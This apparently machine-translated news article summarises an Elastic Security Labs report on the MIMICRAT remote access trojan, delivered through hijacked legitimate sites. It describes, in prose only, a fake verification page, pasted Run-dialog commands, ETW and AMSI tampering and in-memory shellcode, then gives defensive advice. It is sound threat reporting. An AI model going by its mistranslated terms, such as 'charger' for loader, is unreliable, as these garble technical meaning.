MIMICRAT: the RAT that is camouflaged in legitimate sites and operates in memory to take control of your systems

Cybersecurity researchers have brought to light a sophisticated campaign that abuses legitimate sites committed to propagating a remote trojan so far unpublicly documented, named MIMICRAT (also known as AstarionRAT). The most recent analysis of Elastic Security Labs details how attackers combine social engineering techniques, PowerShell chains and in- memory payloads to achieve persistence and remote control over Windows machines; you can see the full report on the Elastic site to see the relevant indicators and telemetry: Elastic Security Labs - MIMICRAT.

The intrusion begins very discreetly: legitimate pages are modified to serve malicious code which, in turn, loads externally hosted scripts. In the case documented by Elastic, the service concerned was bincheck [.] io, a BIN validation site (Bank Identification Number). The injected JavaScript redirects the victim to a PHP script that simulates a Cloudflare verification and convinces the user to copy and paste a command into the Run Windows dialog. This simple gesture triggers the execution of a PowerShell chain that contacts a command and control server (C2) to download the next stage of the attack.

The sophistication of the chain is notorious: the second PowerShell script is not limited to running code; it modifies the system's behavior to avoid detection. Among the documented actions are manipulations aimed at Windows event telemetry and Microsoft's anti-malware interface, known respectively as ETW (Event Tracing for Windows) and AMSI (Antimalware Scan Interface). Both mechanisms are precisely the defences on which operators try to hatch their payload without being observed - to deepen on these components, Microsoft maintains technical documentation: ETW and AMSI.

Once these barriers are mined, the process delivers a loader written in Lua that decrypt and runs shellcode directly in memory. This shellcode finally installs the MIMICRAT agent, who communicates with his C2 through HTTPS through port 443. The choice of HTTPS and the emulation of own traffic patterns of web analytics tools make it easier for offensive telemetry to pass unnoticed between legitimate communications.

From the functional point of view, MIMICRAT is a custom software piece written on C + + that offers a wide range of post-operation capabilities. Among its faculties are the supplanting of Windows tokens to scale privileges, the creation of SOCKS5 tunnels for routing traffic, and an extensive set of commands - according to Elastic, about 22 - that include process control and file system, access to an interactive shell, shellcode injection and proxy functionality. It is, in essence, a pretty complete kit for lateral movement, stealth and exfiltration.

Another relevant aspect of the attack is its international character and its massive orientation: the bait shown to the victims is dynamically located in 17 different languages, so that the decoy is adapted to the language of the browser and increases the likelihood of deception. The victims identified by researchers include from academic institutions in the United States to users in Chinese-speaking forums, which points to an opportunistic campaign with wide geographical scope.

The traces observed by Elastic also coincide, in tactics and infrastructure, with another research published by Huntress that describes ClickFix campaigns related to the use of the Matanbuchus 3.0 charger as a bridge to the same type of RAT. If you want to review additional analysis and operational context, Huntress's research page contains technical articles and examples of detections: Huntress - Blog.

What is the attacker after? Although it is not always possible to affirm with complete certainty the final intention, all the elements of the attack - the ability to establish tunnels, to operate tokens, to execute arbitrary commands and to hide communications - fit with typical objectives of ansomware or mass data extraction. In other incidents with similar patterns, actors have used initial access to deploy destructive loads or to channel large volumes of information outside the compromised network.

For organizations and users the lessons are clear and should be applied with priority: distrust of instructions that ask to copy and paste commands on a console or in Run, review the integrity of third party sites used as recurrent services and strengthen detection at the end by monitoring solutions that monitor abnormal behaviors, not just signatures. In addition, the protection of the mechanisms that attackers seek to manipulate - such as ETW and AMSI - and the visibility of processes that perform executable downloads or memory injection are critical elements of defense. To better understand what a RAT is and why they are so dangerous, it is useful to consult reference resources like the Kaspersky threat center: Kaspersky - Remote Access Trojans.

Campaigns of this nature reveal two realities: attackers prefer to exploit the trust that people place in legitimate services and traditional defenses may not be enough if the chain of attack is run in memory and avoids signatures. The response requires both technical actions - encrypted traffic monitoring, network segmentation, endpoints hardening and process anomalies detection - and organizational measures that reduce the risk of a user running dangerous commands. The Elastic report provides indicators and techniques that can help in detection and mediation; reviewing and correlating it with internal records is a good initial step for any security team.